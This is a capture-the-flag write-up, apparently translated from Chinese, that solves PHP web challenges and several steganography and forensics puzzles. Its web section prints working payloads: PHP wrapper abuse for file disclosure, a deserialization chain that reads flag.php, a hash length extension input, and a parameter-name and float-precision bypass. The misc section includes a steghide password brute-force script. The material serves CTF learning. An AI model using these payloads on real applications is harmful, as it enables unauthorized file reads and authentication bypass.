Web
EasyPhp
<?php
$sz_txt = $_GET["sz_txt"];
$sz_file = $_GET["sz_file"];
$password = $_GET["password"];
if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
echo "<br><h1>".file_get_contents($sz_txt,'r')."</h1></br>";
if(preg_match("/flag/",$sz_file)){
echo "Not now!";
exit();
}else{
include($sz_file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
$sz_txt
Use data://
or php://input
pseudo protocol, then $sz_file
use php://filter
pseudo protocol to read the source code
?sz_txt=data:text/plain,welcome to jxsz&sz_file=php://filter/read=convert.base64-encode/resource=useless.php
base64 decode to get the useless.php
source code
<?php
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
?>
Construct the deserialized poc, directly modify the attribute $file
to read the file name of the source code
<?php
class Flag{
public $file = "flag.php";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
$res = new Flag();
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:4:"Flag":1:{
s:4:"file";s:8:"flag.php";}
Capture POST packet and modify GET parameters:?sz_txt=php://input&sz_file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
The POST content is:welcome to jxsz
flag{
4a5a802f-6a37-44d4-8a49-e9066dfd6474}
parseHash
<?php
include("key.php");
class person{
public $aa;
public $bb;
public $username;
public $password;
public function __construct($key=''){
$this->username="jxsz";
$this->password="jxsz";
if(strlen($key)==16&&md5($key . urldecode( $this->username . $this->password)=="a1133ca71ed6320a0255b0d53188be57")){
echo "Welcome";
}
}
public function __destruct(){
$this->aa = (string)$this->aa;
if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
die("no no no");
}
if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
echo "66666666666";
unserialize($_GET['sz_sz.sz']);
}
The original question of the national competition was easytrick
changed, and the test here ishash拓展攻击 + php非法表单名传参 + php浮点数高精度绕过
Hash expansion attack
$this->username = "jxsz"
$this->password = "jxsz"
strlen($key)==16
md5($key.urldecode($this->username.$this->password)) = "a1133ca71ed6320a0255b0d53188be57"
strlen($key) + strlen("jxsz") = 20
最后一个条件: 传入字符串中需要有“szxy666”字符,并且不能放在开头
hashpump
Generate directly using hash expansion attack tools
Hashpump tool address: https://github.com/bwall/HashPump
ec789edf786174babd157da5492e1850
jxsz\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00szxy666
Will be \x00
replaced by the %00
incoming can successfully carry out an output bypass66666666666
pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=ec789edf786174babd157da5492e1850
GET
Illegal characters in the deserialized parameter name.
unserialize($_GET['sz_sz.sz']);
Here is based on PHP's handling mechanism for illegal transfer of names: https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified
Can be found in illegal processing hexadecimal characters appear in mass participation were .
only replaced once
it here for the title variable name sz_sz.sz
in order to prevent .
being replaced _
by replacing only one binary processing incoming parameter name was changed sz[sz.sz
to
?sz[sz.sz=
The next step is easytrick
the practice of the national competition , but here is the bypass method of filtering NAN
and INF
, but it can still be bypassed with high precision using floating point numbers. The serialized poc is as follows:
<?php
class person{
public $aa;
public $bb;
}
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
payload
?sz[sz.sz=O:6:"person":2:{
s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
flag{
4a1a802f-6b37-44c4-8b49-e9066ddd6474}
Misc
Checkin
flag{
welc0me_to_ganwangbei}
face
Lennyfuck interpreter
https://github.com/Knorax/Lennyfuck_interpreter
Just follow the comparison table to replace
++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->++++<]>++++.<+++++[->-----<]>---------.<++++[->++++<]>++++++.++++++.<++++[->----<]>------.<+++[->+++<]>+++.<+++++[->-----<]>----.<+++++[->+++++<]>++++++++.++++++++.<++++[->----<]>--------.+++.<++++[->++++<]>.<++++[->----<]>-.++++++++.+++++.<+++[->---<]>------.+++++++.-----.++.++.------.<+++++[->-----<]>-----.<++++++[->++++++<]>+++++++++.<+++[->---<]>-.-----.<++++[->----<]>---.<+++++[->+++++<]>.+++++++++..<+++[->+++<]>++.<++++[->----<]>---.<+++[->+++<]>++++++.<++++[->----<]>--.++++++++.<++++[->++++<]>++.<
Online explanation website: https://sange.fi/esoteric/brainfuck/impl/interp/i.html
flag{
You_kNow_brain_face_And_Lennyfuck}
DestroyJava
The download attachment is a mp4
file, the video content is about destroying JAVA, and there is no clue. After binwalk
analysis, it is found that there are pictures steganographic in the mp4
file, using foremost
separation
Get a jpg
picture, steghide info
detect the jpg
steganographic file
Use a script to blast the password,
# -*- coding: utf8 -*-
#python2
from subprocess import *
def foo():
stegoFile='flag.jpg'#这里填图片名称
extractFile='output.txt'#输出从图片中得到的隐藏内容
passFile='password.txt'#密码字典
errors=['could not extract','steghide --help','Syntax error']
cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
f=open(passFile,'r')
for line in f.readlines():
cmd=cmdFormat %(stegoFile,extractFile,line.strip())
p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
content=unicode(p.stdout.read(),'gbk')
for err in errors:
if err in content:
break
else:
print content,
print 'the passphrase is %s' %(line.strip())
f.close()
return
if __name__ == '__main__':
foo()
print 'ok'
pass
Get the password as:, password
and get the steganographic file hide.txt
, check the content and find that the characteristics are similarbase85
W^7?+drDz;VP7$GUvy|?Ut&dbbYE;iZfA92XJub$ZeLVrWnXu1a%^OM
The bse85 online decryption station on the Internet seems to be unable to solve it. Use the python base64 template to solve the base85 decryption to get the flag
flag{
Java_1s_the_bEst_lAnguage_in_The_world}
Hidepig
pig.pdf
It is the postpartum care information of the sow. The guess should be pdf隐写
, use it wbStego4open
, but you need to enter the password. Guess the password is there pig2.pcapng
, use wireshark to open, USB traffic analysis
USB keyboard data package forensic script: https://github.com/WangYihang/UsbKeyboardDataHacker
Just run it as you do
tshark -r ./example.pcap -T fields -e usb.capdata
python UsbKeyboardDataHacker.py ./pig2.pcapng
Then use wbStego4open
, extract the hidden pdf files`
wbStego4open download address: http://www.bailer.at/wbstego/fs_download.html
Fill in the password and
select the output file
flag{
pDF_1s_r2a1ly_intEresT1ng}